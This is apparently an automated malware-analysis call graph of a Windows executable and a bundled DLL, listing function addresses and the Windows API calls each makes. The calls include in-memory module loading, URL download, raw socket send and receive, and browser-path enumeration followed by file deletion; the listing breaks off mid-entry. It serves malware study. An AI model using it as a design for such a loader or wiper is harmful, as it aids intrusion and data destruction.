40e9e1 GetModuleFileNameW 54468 40f3c3 53987->54468 53989 40e9fd 53990 4020f6 28 API calls 53989->53990 53991 40ea0c 53990->53991 53992 4020f6 28 API calls 53991->53992 53993 40ea1b 53992->53993 53994 41be1b 28 API calls 53993->53994 53995 40ea24 53994->53995 54483 40fb17 53995->54483 53997 40ea2d 53998 401e8d 11 API calls 53997->53998 53999 40ea36 53998->53999 54000 40ea93 53999->54000 54001 40ea49 53999->54001 54002 401e65 22 API calls 54000->54002 54678 40fbb3 118 API calls 54001->54678 54004 40eaa3 54002->54004 54008 401e65 22 API calls 54004->54008 54005 40ea5b 54006 401e65 22 API calls 54005->54006 54007 40ea67 54006->54007 54679 410f37 36 API calls __EH_prolog 54007->54679 54009 40eac2 54008->54009 54011 40531e 28 API calls 54009->54011 54013 40ead1 54011->54013 54012 40ea79 54680 40fb64 78 API calls 54012->54680 54014 406383 28 API calls 54013->54014 54016 40eadd 54014->54016 54018 401fe2 28 API calls 54016->54018 54017 40ea82 54681 40f3b0 71 API calls 54017->54681 54020 40eae9 54018->54020 54021 401fd8 11 API calls 54020->54021 54022 40eaf2 54021->54022 54024 401fd8 11 API calls 54022->54024 54026 40eafb 54024->54026 54027 401e65 22 API calls 54026->54027 54028 40eb04 54027->54028 54029 401fc0 28 API calls 54028->54029 54030 40eb0f 54029->54030 54031 401e65 22 API calls 54030->54031 54032 40eb28 54031->54032 54033 401e65 22 API calls 54032->54033 54034 40eb43 54033->54034 54035 40ebae 54034->54035 54682 406c1e 54034->54682 54036 401e65 22 API calls 54035->54036 54042 40ebbb 54036->54042 54038 40eb70 54039 401fe2 28 API calls 54038->54039 54040 40eb7c 54039->54040 54043 401fd8 11 API calls 54040->54043 54041 40ec02 54487 40d069 54041->54487 54042->54041 54048 413549 3 API calls 54042->54048 54045 40eb85 54043->54045 54687 413549 RegOpenKeyExA 54045->54687 54054 40ebe6 54048->54054 54052 40f34f 54780 4139a9 30 API calls 54052->54780 54054->54041 54690 4139a9 30 API calls 54054->54690 54062 40f365 54781 412475 65 API calls ___scrt_get_show_window_mode 54062->54781 54263->53933 54264->53946 54269->53960 54271 438f36 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54270->54271 54283 43a43a 54271->54283 54274 438f44 54274->53962 54276 438f4c 54277 438f57 54276->54277 54297 43a476 DeleteCriticalSection 54276->54297 54277->53962 54325 44fb68 54279->54325 54282 438f5a 8 API calls 3 library calls 54282->53967 54284 43a443 54283->54284 54286 43a46c 54284->54286 54287 438f40 54284->54287 54298 438e7f 54284->54298 54303 43a476 DeleteCriticalSection 54286->54303 54287->54274 54289 43a3ec 54287->54289 54318 438d94 54289->54318 54291 43a3f6 54292 43a401 54291->54292 54323 438e42 6 API calls try_get_function 54291->54323 54292->54276 54294 43a40f 54295 43a41c 54294->54295 54324 43a41f 6 API calls ___vcrt_FlsFree 54294->54324 54295->54276 54297->54274 54304 438c73 54298->54304 54301 438eb6 InitializeCriticalSectionAndSpinCount 54302 438ea2 54301->54302 54302->54284 54303->54287 54305 438ca3 54304->54305 54306 438ca7 54304->54306 54305->54306 54310 438cc7 54305->54310 54311 438d13 54305->54311 54306->54301 54306->54302 54308 438cd3 GetProcAddress 54309 438ce3 __crt_fast_encode_pointer 54308->54309 54309->54306 54310->54306 54310->54308 54312 438d3b LoadLibraryExW 54311->54312 54313 438d30 54311->54313 54314 438d57 GetLastError 54312->54314 54315 438d6f 54312->54315 54313->54305 54314->54315 54316 438d62 LoadLibraryExW 54314->54316 54315->54313 54317 438d86 FreeLibrary 54315->54317 54316->54315 54317->54313 54319 438c73 try_get_function 5 API calls 54318->54319 54320 438dae 54319->54320 54321 438db7 54320->54321 54322 438dc6 TlsAlloc 54320->54322 54321->54291 54323->54294 54324->54292 54328 44fb81 54325->54328 54326 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54327 4345bd 54326->54327 54327->53965 54327->54282 54328->54326 54330 44f06b 54329->54330 54331 44f062 54329->54331 54330->53983 54334 44ef58 54331->54334 54333->53983 54335 448215 __Toupper 36 API calls 54334->54335 54336 44ef65 54335->54336 54354 44f077 54336->54354 54338 44ef6d 54363 44ecec 54338->54363 54342 44efc7 54345 446782 _free 20 API calls 54342->54345 54347 44ef84 54345->54347 54347->54330 54348 44efc2 54387 4405dd 20 API calls _free 54348->54387 54350 44f00b 54350->54342 54388 44ebc2 20 API calls 54350->54388 54351 44efdf 54351->54350 54352 446782 _free 20 API calls 54351->54352 54352->54350 54355 44f083 ___FrameUnwindToState 54354->54355 54356 448215 __Toupper 36 API calls 54355->54356 54358 44f08d 54356->54358 54359 44f111 ___FrameUnwindToState 54358->54359 54362 446782 _free 20 API calls 54358->54362 54389 4460f4 36 API calls 4 library calls 54358->54389 54390 445888 EnterCriticalSection 54358->54390 54391 44f108 LeaveCriticalSection std::_Lockit::~_Lockit 54358->54391 54359->54338 54362->54358 54364 43a7b7 __cftoe 36 API calls 54363->54364 54365 44ecfe 54364->54365 54366 44ed0d GetOEMCP 54365->54366 54367 44ed1f 54365->54367 54368 44ed36 54366->54368 54367->54368 54369 44ed24 GetACP 54367->54369 54368->54347 54370 446137 54368->54370 54369->54368 54371 446175 54370->54371 54375 446145 __Getctype 54370->54375 54393 4405dd 20 API calls _free 54371->54393 54373 446160 RtlAllocateHeap 54374 446173 54373->54374 54373->54375 54374->54342 54377 44f119 54374->54377 54375->54371 54375->54373 54392 442f80 7 API calls 2 library calls 54375->54392 54378 44ecec 38 API calls 54377->54378 54379 44f138 54378->54379 54382 44f189 IsValidCodePage 54379->54382 54384 44f13f 54379->54384 54386 44f1ae ___scrt_get_show_window_mode 54379->54386 54380 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54381 44efba 54380->54381 54381->54348 54381->54351 54383 44f19b GetCPInfo 54382->54383 54382->54384 54383->54384 54383->54386 54384->54380 54394 44edc4 GetCPInfo 54386->54394 54387->54342 54388->54342 54389->54358 54390->54358 54391->54358 54392->54375 54393->54374 54395 44eea8 54394->54395 54401 44edfe 54394->54401 54398 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54395->54398 54400 44ef54 54398->54400 54400->54384 54404 45112c 54401->54404 54403 44ae66 _swprintf 41 API calls 54403->54395 54405 43a7b7 __cftoe 36 API calls 54404->54405 54406 45114c MultiByteToWideChar 54405->54406 54408 45118a 54406->54408 54415 451222 54406->54415 54410 446137 ___crtLCMapStringA 21 API calls 54408->54410 54416 4511ab __alloca_probe_16 ___scrt_get_show_window_mode 54408->54416 54409 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54411 44ee5f 54409->54411 54410->54416 54418 44ae66 54411->54418 54412 45121c 54423 435e40 20 API calls _free 54412->54423 54414 4511f0 MultiByteToWideChar 54414->54412 54417 45120c GetStringTypeW 54414->54417 54415->54409 54416->54412 54416->54414 54417->54412 54419 43a7b7 __cftoe 36 API calls 54418->54419 54420 44ae79 54419->54420 54424 44ac49 54420->54424 54423->54415 54425 44ac64 ___crtLCMapStringA 54424->54425 54426 44ac8a MultiByteToWideChar 54425->54426 54427 44acb4 54426->54427 54438 44ae3e 54426->54438 54430 446137 ___crtLCMapStringA 21 API calls 54427->54430 54434 44acd5 __alloca_probe_16 54427->54434 54428 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54429 44ae51 54428->54429 54429->54403 54430->54434 54431 44ad1e MultiByteToWideChar 54432 44ad37 54431->54432 54433 44ad8a 54431->54433 54451 448bb3 54432->54451 54460 435e40 20 API calls _free 54433->54460 54434->54431 54434->54433 54438->54428 54439 44ad61 54439->54433 54441 448bb3 _strftime 11 API calls 54439->54441 54440 44ad99 54443 446137 ___crtLCMapStringA 21 API calls 54440->54443 54446 44adba __alloca_probe_16 54440->54446 54441->54433 54442 44ae2f 54459 435e40 20 API calls _free 54442->54459 54443->54446 54444 448bb3 _strftime 11 API calls 54447 44ae0e 54444->54447 54446->54442 54446->54444 54447->54442 54448 44ae1d WideCharToMultiByte 54447->54448 54448->54442 54449 44ae5d 54448->54449 54461 435e40 20 API calls _free 54449->54461 54452 4484ca __Toupper 5 API calls 54451->54452 54453 448bda 54452->54453 54455 448be3 54453->54455 54462 448c3b 10 API calls 3 library calls 54453->54462 54457 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 54455->54457 54456 448c23 LCMapStringW 54456->54455 54458 448c35 54457->54458 54458->54433 54458->54439 54458->54440 54459->54433 54460->54438 54461->54433 54462->54456 54464 41cb8f LoadLibraryA GetProcAddress 54463->54464 54465 41cb7f GetModuleHandleA GetProcAddress 54463->54465 54466 41cbb8 44 API calls 54464->54466 54467 41cba8 LoadLibraryA GetProcAddress 54464->54467 54465->54464 54466->53987 54467->54466 54782 41b4a8 FindResourceA 54468->54782 54471 43bd51 new 21 API calls 54472 40f3ed ctype 54471->54472 54473 4020b7 28 API calls 54472->54473 54474 40f408 54473->54474 54475 401fe2 28 API calls 54474->54475 54476 40f413 54475->54476 54477 401fd8 11 API calls 54476->54477 54478 40f41c 54477->54478 54479 43bd51 new 21 API calls 54478->54479 54480 40f42d ctype 54479->54480 54785 406dd8 54480->54785 54482 40f460 54482->53989 54484 40fb23 54483->54484 54486 40fb2a 54483->54486 54788 402163 11 API calls 54484->54788 54486->53997 54789 401fab 54487->54789 54678->54005 54679->54012 54680->54017 54683 4020df 11 API calls 54682->54683 54684 406c2a 54683->54684 54685 4032a0 28 API calls 54684->54685 54686 406c47 54685->54686 54686->54038 54688 40eba4 54687->54688 54689 413573 RegQueryValueExA RegCloseKey 54687->54689 54688->54035 54688->54052 54689->54688 54690->54041 54780->54062 54783 41b4c5 LoadResource LockResource SizeofResource 54782->54783 54784 40f3de 54782->54784 54783->54784 54784->54471 54786 4020b7 28 API calls 54785->54786 54787 406dec 54786->54787 54787->54482 54788->54486 55148 4269e6 55149 4269fb 55148->55149 55155 426a8d 55148->55155 55150 426a48 55149->55150 55151 426b44 55149->55151 55152 426abd 55149->55152 55153 426b1d 55149->55153 55149->55155 55159 426af2 55149->55159 55161 426a7d 55149->55161 55176 424edd 49 API calls ctype 55149->55176 55150->55155 55150->55161 55177 41fb6c 52 API calls 55150->55177 55151->55155 55181 426155 28 API calls 55151->55181 55152->55155 55152->55159 55179 41fb6c 52 API calls 55152->55179 55153->55151 55153->55155 55164 425ae1 55153->55164 55159->55153 55180 4256f0 21 API calls 55159->55180 55161->55152 55161->55155 55178 424edd 49 API calls ctype 55161->55178 55166 425b00 ___scrt_get_show_window_mode 55164->55166 55165 425b34 55165->55151 55166->55165 55168 425b0f 55166->55168 55182 41ebbb 21 API calls 55166->55182 55168->55165 55175 425b14 55168->55175 55183 4205d8 46 API calls 55168->55183 55171 425b1d 55171->55165 55186 424d05 21 API calls 2 library calls 55171->55186 55173 425bb7 55173->55165 55184 432ec4 21 API calls new 55173->55184 55175->55165 55175->55171 55185 41da5f 49 API calls 55175->55185 55176->55150 55177->55150 55178->55152 55179->55152 55180->55153 55181->55155 55182->55168 55183->55173 55184->55175 55185->55171 55186->55165 55187 415d06 55202 41b380 55187->55202 55189 415d0f 55190 4020f6 28 API calls 55189->55190 55191 415d1e 55190->55191 55192 404aa1 61 API calls 55191->55192 55193 415d2a 55192->55193 55194 417089 55193->55194 55195 401fd8 11 API calls 55193->55195 55196 401e8d 11 API calls 55194->55196 55195->55194 55197 417092 55196->55197 55198 401fd8 11 API calls 55197->55198 55199 41709e 55198->55199 55200 401fd8 11 API calls 55199->55200 55201 4170aa 55200->55201 55203 4020df 11 API calls 55202->55203 55204 41b38e 55203->55204 55205 43bd51 new 21 API calls 55204->55205 55206 41b39e InternetOpenW InternetOpenUrlW 55205->55206 55207 41b3c5 InternetReadFile 55206->55207 55210 41b3e8 55207->55210 55208 4020b7 28 API calls 55208->55210 55209 41b415 InternetCloseHandle InternetCloseHandle 55211 41b427 55209->55211 55210->55207 55210->55208 55210->55209 55212 401fd8 11 API calls 55210->55212 55211->55189 55212->55210 55213 1000c7a7 55214 1000c7be 55213->55214 55219 1000c82c 55213->55219 55214->55219 55223 1000c7e6 GetModuleHandleA 55214->55223 55215 1000c872 55216 1000c835 GetModuleHandleA 55218 1000c83f 55216->55218 55218->55218 55218->55219 55219->55215 55219->55216 55224 1000c7ef 55223->55224 55231 1000c82c 55223->55231 55233 1000c803 55224->55233 55226 1000c835 GetModuleHandleA 55228 1000c83f 55226->55228 55227 1000c872 55228->55228 55228->55231 55231->55226 55231->55227 55234 1000c809 55233->55234 55235 1000c82c 55234->55235 55236 1000c80d VirtualProtect 55234->55236 55238 1000c872 55235->55238 55239 1000c835 GetModuleHandleA 55235->55239 55236->55235 55237 1000c81c VirtualProtect 55236->55237 55237->55235 55240 1000c83f 55239->55240 55240->55235 55241 426c4b 55246 426cc8 send 55241->55246 55247 42f8ed 55248 42f8f8 55247->55248 55250 42f90c 55248->55250 55251 432eee 55248->55251 55250->55250 55252 432ef9 55251->55252 55253 432efd 55251->55253 55252->55250 55255 440f0d 55253->55255 55256 446185 55255->55256 55257 446192 55256->55257 55258 44619d 55256->55258 55259 446137 ___crtLCMapStringA 21 API calls 55257->55259 55260 4461a5 55258->55260 55266 4461ae __Getctype 55258->55266 55265 44619a 55259->55265 55263 446782 _free 20 API calls 55260->55263 55261 4461b3 55268 4405dd 20 API calls _free 55261->55268 55262 4461d8 HeapReAlloc 55262->55265 55262->55266 55263->55265 55265->55252 55266->55261 55266->55262 55269 442f80 7 API calls 2 library calls 55266->55269 55268->55265 55269->55266 55270 434875 55275 434b47 SetUnhandledExceptionFilter 55270->55275 55272 43487a pre_c_initialization 55276 44554b 20 API calls 2 library calls 55272->55276 55274 434885 55275->55272 55276->55274 55277 44831e 55285 448710 55277->55285 55280 448332 55282 44833a 55283 448347 55282->55283 55293 44834a 11 API calls 55282->55293 55286 4484ca __Toupper 5 API calls 55285->55286 55287 448737 55286->55287 55288 448740 55287->55288 55289 44874f TlsAlloc 55287->55289 55290 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 55288->55290 55289->55288 55291 448328 55290->55291 55291->55280 55292 448299 20 API calls 3 library calls 55291->55292 55292->55282 55293->55280 55294 43be58 55297 43be64 _swprintf ___FrameUnwindToState 55294->55297 55295 43be72 55310 4405dd 20 API calls _free 55295->55310 55297->55295 55299 43be9c 55297->55299 55298 43be77 __cftoe ___FrameUnwindToState 55305 445888 EnterCriticalSection 55299->55305 55301 43bea7 55306 43bf48 55301->55306 55305->55301 55307 43bf56 55306->55307 55309 43beb2 55307->55309 55312 44976c 37 API calls 2 library calls 55307->55312 55311 43becf LeaveCriticalSection std::_Lockit::~_Lockit 55309->55311 55310->55298 55311->55298 55312->55307 55313 100020db 55314 100020e7 ___DestructExceptionObject 55313->55314 55315 10002110 dllmain_raw 55314->55315 55320 1000210b 55314->55320 55324 100020f6 55314->55324 55316 1000212a 55315->55316 55315->55324 55326 10001eec 55316->55326 55318 10002177 55319 10001eec 29 API calls 55318->55319 55318->55324 55321 1000218a 55319->55321 55320->55318 55323 10001eec 29 API calls 55320->55323 55320->55324 55322 10002193 dllmain_raw 55321->55322 55321->55324 55322->55324 55325 1000216d dllmain_raw 55323->55325 55325->55318 55327 10001ef7 55326->55327 55328 10001f2a dllmain_crt_process_detach 55326->55328 55329 10001f1c dllmain_crt_process_attach 55327->55329 55330 10001efc 55327->55330 55335 10001f06 55328->55335 55329->55335 55331 10001f01 55330->55331 55332 10001f12 55330->55332 55331->55335 55336 1000240b 25 API calls 55331->55336 55337 100023ec 27 API calls 55332->55337 55335->55320 55336->55335 55337->55335 55338 41dfbd 55339 41dfd2 ctype ___scrt_get_show_window_mode 55338->55339 55351 41e1d5 55339->55351 55357 432ec4 21 API calls new 55339->55357 55342 41e1e6 55350 41e189 55342->55350 55353 432ec4 21 API calls new 55342->55353 55344 41e182 ___scrt_get_show_window_mode 55344->55350 55358 432ec4 21 API calls new 55344->55358 55346 41e21f ___scrt_get_show_window_mode 55346->55350 55354 43354a 55346->55354 55347 41e1af ___scrt_get_show_window_mode 55347->55350 55359 432ec4 21 API calls new 55347->55359 55351->55350 55352 41db62 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 55351->55352 55352->55342 55353->55346 55360 433469 55354->55360 55356 433552 55356->55350 55357->55344 55358->55347 55359->55351 55361 433482 55360->55361 55364 433478 55360->55364 55361->55364 55366 432ec4 21 API calls new 55361->55366 55363 4334a3 55363->55364 55367 433837 CryptAcquireContextA 55363->55367 55364->55356 55366->55363 55368 433853 55367->55368 55369 433858 CryptGenRandom 55367->55369 55368->55364 55369->55368 55370 43386d CryptReleaseContext 55369->55370 55370->55368 55371 40165e 55372 401666 55371->55372 55373 401669 55371->55373 55374 4016a8 55373->55374 55376 401696 55373->55376 55375 4344ea new 22 API calls 55374->55375 55378 40169c 55375->55378 55377 4344ea new 22 API calls 55376->55377 55377->55378 55379 426bdc 55385 426cb1 recv 55379->55385 55386 41299f 55387 4129b1 55386->55387 55388 4041a2 28 API calls 55387->55388 55389 4129c4 55388->55389 55390 4020f6 28 API calls 55389->55390 55391 4129d3 55390->55391 55392 4020f6 28 API calls 55391->55392 55393 4129e2 55392->55393 55394 41be1b 28 API calls 55393->55394 55396 4129eb 55394->55396 55395 412a93 55398 401e8d 11 API calls 55395->55398 55396->55395 55397 401e65 22 API calls 55396->55397 55399 412a02 55397->55399 55400 412a9c 55398->55400 55402 4020f6 28 API calls 55399->55402 55401 401fd8 11 API calls 55400->55401 55403 412aa5 55401->55403 55404 412a0d 55402->55404 55405 401fd8 11 API calls 55403->55405 55406 401e65 22 API calls 55404->55406 55407 412aad 55405->55407 55408 412a18 55406->55408 55409 4020f6 28 API calls 55408->55409 55410 412a23 55409->55410 55411 401e65 22 API calls 55410->55411 55412 412a2e 55411->55412 55413 4020f6 28 API calls 55412->55413 55414 412a39 55413->55414 55415 401e65 22 API calls 55414->55415 55416 412a44 55415->55416 55417 4020f6 28 API calls 55416->55417 55418 412a4f 55417->55418 55419 401e65 22 API calls 55418->55419 55420 412a5a 55419->55420 55421 4020f6 28 API calls 55420->55421 55422 412a65 55421->55422 55423 401e65 22 API calls 55422->55423 55424 412a73 55423->55424 55425 4020f6 28 API calls 55424->55425 55426 412a7e 55425->55426 55430 412ab4 GetModuleFileNameW 55426->55430 55429 404e26 99 API calls 55429->55395 55431 4020df 11 API calls 55430->55431 55432 412adf 55431->55432 55433 4020df 11 API calls 55432->55433 55434 412aeb 55433->55434 55435 4020df 11 API calls 55434->55435 55457 412af7 55435->55457 55436 41b978 43 API calls 55436->55457 55437 40d9e8 32 API calls 55437->55457 55438 401fd8 11 API calls 55438->55457 55439 40417e 28 API calls 55439->55457 55440 4042fc 84 API calls 55440->55457 55441 40431d 28 API calls 55441->55457 55442 412c1d Sleep 55442->55457 55443 403014 28 API calls 55443->55457 55444 418568 31 API calls 55444->55457 55445 412cbf Sleep 55445->55457 55446 401f09 11 API calls 55446->55457 55447 412d61 Sleep 55447->55457 55448 412dc4 DeleteFileW 55448->55457 55449 41c485 32 API calls 55449->55457 55450 412dfb DeleteFileW 55450->55457 55451 412e4d Sleep 55451->55457 55452 412e37 DeleteFileW 55452->55457 55453 412ec6 55454 401f09 11 API calls 55453->55454 55455 412ed2 55454->55455 55456 401f09 11 API calls 55455->55456 55458 412ede 55456->55458 55457->55436 55457->55437 55457->55438 55457->55439 55457->55440 55457->55441 55457->55442 55457->55443 55457->55444 55457->55445 55457->55446 55457->55447 55457->55448 55457->55449 55457->55450 55457->55451 55457->55453 55461 412e92 Sleep 55457->55461 55464 412e26 55457->55464 55459 401f09 11 API calls 55458->55459 55460 412eea 55459->55460 55463 40b904 28 API calls 55460->55463 55462 401f09 11 API calls 55461->55462 55462->55464 55465 412efd 55463->55465 55464->55452 55464->55457 55467 401f09 11 API calls 55464->55467 55470 412ec4 55464->55470 55466 4020f6 28 API calls 55465->55466 55468 412f1d 55466->55468 55467->55464 55577 41322d 55468->55577 55470->55460 55472 401f09 11 API calls 55473 412f34 55472->55473 55474 412f54 55473->55474 55475 4130a8 55473->55475 55477 41bd1e 28 API calls 55474->55477 55476 41bd1e 28 API calls 55475->55476 55478 4130b1 55476->55478 55479 412f60 55477->55479 55480 402f31 28 API calls 55478->55480 55481 41bb8e 28 API calls 55479->55481 55482 4130e8 55480->55482 55483 412f7a 55481->55483 55484 402f10 28 API calls 55482->55484 55485 402f31 28 API calls 55483->55485 55487 4130f7 55484->55487 55486 412faa 55485->55486 55489 402f10 28 API calls 55486->55489 55488 402f10 28 API calls 55487->55488 55490 413103 55488->55490 55491 412fb9 55489->55491 55492 402f10 28 API calls 55490->55492 55493 402f10 28 API calls 55491->55493 55494 413112 55492->55494 55495 412fc8 55493->55495 55496 402f10 28 API calls 55494->55496 55497 402f10 28 API calls 55495->55497 55498 413121 55496->55498 55499 412fd7 55497->55499 55500 402f10 28 API calls 55498->55500 55501 402f10 28 API calls 55499->55501 55502 413130 55500->55502 55503 412fe6 55501->55503 55504 402f10 28 API calls 55502->55504 55505 402f10 28 API calls 55503->55505 55506 41313f 55504->55506 55507 412ff2 55505->55507 55591 402ea1 28 API calls 55506->55591 55509 402f10 28 API calls 55507->55509 55511 412ffe 55509->55511 55510 413149 55512 404aa1 61 API calls 55510->55512 55589 402ea1 28 API calls 55511->55589 55514 413156 55512->55514 55516 401fd8 11 API calls 55514->55516 55515 41300d 55517 402f10 28 API calls 55515->55517 55519 413162 55516->55519 55518 413019 55517->55518 55590 402ea1 28 API calls 55518->55590 55520 401fd8 11 API calls 55519->55520 55522 41316e 55520->55522 55524 401fd8 11 API calls 55522->55524 55523 413023 55525 404aa1 61 API calls 55523->55525 55526 41317a 55524->55526 55527 413030 55525->55527 55528 401fd8 11 API calls 55526->55528 55529 401fd8 11 API calls 55527->55529 55530 413186 55528->55530 55531 413039 55529->55531 55532 401fd8 11 API calls 55530->55532 55533 401fd8 11 API calls 55531->55533 55534 41318f 55532->55534 55535 413042 55533->55535 55536 401fd8 11 API calls 55534->55536 55537 401fd8 11 API calls 55535->55537 55538 413198 55536->55538 55539 41304b 55537->55539 55540 401fd8 11 API calls 55538->55540 55541 401fd8 11 API calls 55539->55541 55542 41309c 55540->55542 55543 413054 55541->55543 55545 401fd8 11 API calls 55542->55545 55544 401fd8 11 API calls 55543->55544 55546 413060 55544->55546 55547 4131aa 55545->55547 55548 401fd8 11 API calls 55546->55548 55550 401f09 11 API calls 55547->55550 55549 41306c 55548->55549 55552 401fd8 11 API calls 55549->55552 55551 4131b6 55550->55551 55553 401fd8 11 API calls 55551->55553 55554 413078 55552->55554 55555 4131c2 55553->55555 55556 401fd8 11 API calls 55554->55556 55557 401fd8 11 API calls 55555->55557 55558 413084 55556->55558 55559 4131ce 55557->55559 55560 401fd8 11 API calls 55558->55560 55561 401fd8 11 API calls 55559->55561 55562 413090 55560->55562 55563 4131da 55561->55563 55564 401fd8 11 API calls 55562->55564 55565 401fd8 11 API calls 55563->55565 55564->55542 55566 4131e6 55565->55566 55567 401fd8 11 API calls 55566->55567 55568 4131f2 55567->55568 55569 401fd8 11 API calls 55568->55569 55570 4131fe 55569->55570 55571 401fd8 11 API calls 55570->55571 55572 41320a 55571->55572 55573 401fd8 11 API calls 55572->55573 55574 413216 55573->55574 55575 401fd8 11 API calls 55574->55575 55576 412a83 55575->55576 55576->55429 55578 41326b 55577->55578 55580 41323c 55577->55580 55579 41327a 55578->55579 55592 10001c5b 55578->55592 55581 40417e 28 API calls 55579->55581 55596 411cf2 55580->55596 55583 413286 55581->55583 55584 401fd8 11 API calls 55583->55584 55586 412f28 55584->55586 55586->55472 55589->55515 55590->55523 55591->55510 55593 10001c6b ___scrt_fastfail 55592->55593 55600 100012ee 55593->55600 55595 10001c87 55595->55579 55642 411cfe 55596->55642 55599 411f67 22 API calls new 55599->55578 55601 10001324 ___scrt_fastfail 55600->55601 55602 100013b7 GetEnvironmentVariableW 55601->55602 55626 100010f1 55602->55626 55605 100010f1 51 API calls 55606 10001465 55605->55606 55607 100010f1 51 API calls 55606->55607 55608 10001479 55607->55608 55609 100010f1 51 API calls 55608->55609 55610 1000148d 55609->55610 55611 100010f1 51 API calls 55610->55611 55612 100014a1 55611->55612 55613 100010f1 51 API calls 55612->55613 55614 100014b5 lstrlenW 55613->55614 55615 100014d2 55614->55615 55616 100014d9 lstrlenW 55614->55616 55615->55595 55617 100010f1 51 API calls 55616->55617 55618 10001501 lstrlenW lstrcatW 55617->55618 55619 100010f1 51 API calls 55618->55619 55620 10001539 lstrlenW lstrcatW 55619->55620 55621 100010f1 51 API calls 55620->55621 55622 1000156b lstrlenW lstrcatW 55621->55622 55623 100010f1 51 API calls 55622->55623 55624 1000159d lstrlenW lstrcatW 55623->55624 55625 100010f1 51 API calls 55624->55625 55625->55615 55627 10001118 ___scrt_fastfail 55626->55627 55628 10001129 lstrlenW 55627->55628 55639 10002c40 55628->55639 55630 10001148 lstrcatW lstrlenW 55631 10001177 lstrlenW FindFirstFileW 55630->55631 55632 10001168 lstrlenW 55630->55632 55633 100011a0 55631->55633 55634 100011e1 55631->55634 55632->55631 55635 100011c7 FindNextFileW 55633->55635 55636 100011aa 55633->55636 55634->55605 55635->55633 55638 100011da FindClose 55635->55638 55636->55635 55641 10001000 51 API calls ___scrt_fastfail 55636->55641 55638->55634 55640 10002c57 55639->55640 55640->55630 55640->55640 55641->55636 55677 41179c 55642->55677 55644 411d1c 55645 411d32 SetLastError 55644->55645 55646 41179c SetLastError 55644->55646 55653 411cfa 55644->55653 55645->55653 55647 411d4f 55646->55647 55647->55645 55649 411d71 GetNativeSystemInfo 55647->55649 55647->55653 55650 411db7 55649->55650 55662 411dc4 SetLastError 55650->55662 55680 411ca3 VirtualAlloc 55650->55680 55653->55599 55654 411de7 55655 411e0c GetProcessHeap HeapAlloc 55654->55655 55706 411ca3 VirtualAlloc 55654->55706 55657 411e23 55655->55657 55658 411e35 55655->55658 55707 411cba VirtualFree 55657->55707 55661 41179c SetLastError 55658->55661 55659 411dff 55659->55655 55659->55662 55663 411e7e 55661->55663 55662->55653 55664 411f30 55663->55664 55681 411ca3 VirtualAlloc 55663->55681 55708 412077 GetProcessHeap HeapFree 55664->55708 55667 411e97 ctype 55682 4117af 55667->55682 55669 411ec3 55669->55664 55686 411b5f 55669->55686 55673 411efb 55673->55653 55673->55664 55702 1000220c 55673->55702 55674 411f21 55674->55653 55675 411f25 SetLastError 55674->55675 55675->55664 55678 4117a0 SetLastError 55677->55678 55679 4117ab 55677->55679 55678->55644 55679->55644 55680->55654 55681->55667 55684 411885 55682->55684 55685 4117db ctype ___scrt_get_show_window_mode 55682->55685 55683 41179c SetLastError 55683->55685 55684->55669 55685->55683 55685->55684 55687 411b80 IsBadReadPtr 55686->55687 55688 411c6a 55686->55688 55687->55688 55695 411b9a 55687->55695 55688->55664 55696 41194f 55688->55696 55690 440f0d 22 API calls 55690->55695 55691 411c82 SetLastError 55691->55688 55692 411c6c SetLastError 55692->55688 55693 411c4f IsBadReadPtr 55693->55688 55693->55695 55695->55688 55695->55690 55695->55691 55695->55692 55695->55693 55700 411975 55696->55700 55697 411a5e 55698 4118b2 VirtualProtect 55697->55698 55699 411a70 55698->55699 55699->55673 55700->55697 55700->55699 55709 4118b2 55700->55709 55703 10002215 55702->55703 55704 1000221a dllmain_dispatch 55702->55704 55713 100022b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 55703->55713 55704->55674 55706->55659 55707->55662 55708->55653 55710 4118c3 55709->55710 55712 4118bb 55709->55712 55711 411936 VirtualProtect 55710->55711 55710->55712 55711->55712 55712->55700 55713->55704 55714 10001f3f 55715 10001f4b ___DestructExceptionObject 55714->55715 55732 1000247c 55715->55732 55717 10001f52 55718 10002041 55717->55718 55719 10001f7c 55717->55719 55726 10001f57 ___scrt_is_nonwritable_in_current_image 55717->55726 55748 10002639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 55718->55748 55743 100023de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 55719->55743 55722 10002048 55723 10001f8b __RTC_Initialize 55723->55726 55744 100022fc RtlInitializeSListHead 55723->55744 55725 10001f99 ___scrt_initialize_default_local_stdio_options 55745 100046c5 5 API calls _ValidateLocalCookies 55725->55745 55728 10001fad 55728->55726 55746 100023b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 55728->55746 55730 10001fb8 55730->55726 55747 10004669 5 API calls _ValidateLocalCookies 55730->55747 55733 10002485 55732->55733 55749 10002933 IsProcessorFeaturePresent 55733->55749 55735 10002491 55750 100034ea 55735->55750 55737 10002496 55738 1000249a 55737->55738 55759 100053c8 55737->55759 55738->55717 55741 100024b1 55741->55717 55743->55723 55744->55725 55745->55728 55746->55730 55747->55726 55748->55722 55749->55735 55751 100034ef ___vcrt_initialize_winapi_thunks 55750->55751 55763 10003936 6 API calls 2 library calls 55751->55763 55753 100034f9 55754 100034fd 55753->55754 55764 100038e8 55753->55764 55754->55737 55756 10003505 55757 10003510 55756->55757 55772 10003972 RtlDeleteCriticalSection 55756->55772 55757->55737 55791 10007457 55759->55791 55762 10003529 7 API calls 3 library calls 55762->55738 55763->55753 55773 10003af1 55764->55773 55768 1000390b 55769 10003918 55768->55769 55779 1000391b 5 API calls ___vcrt_FlsFree 55768->55779 55769->55756 55771 100038fd 55771->55756 55772->55754 55780 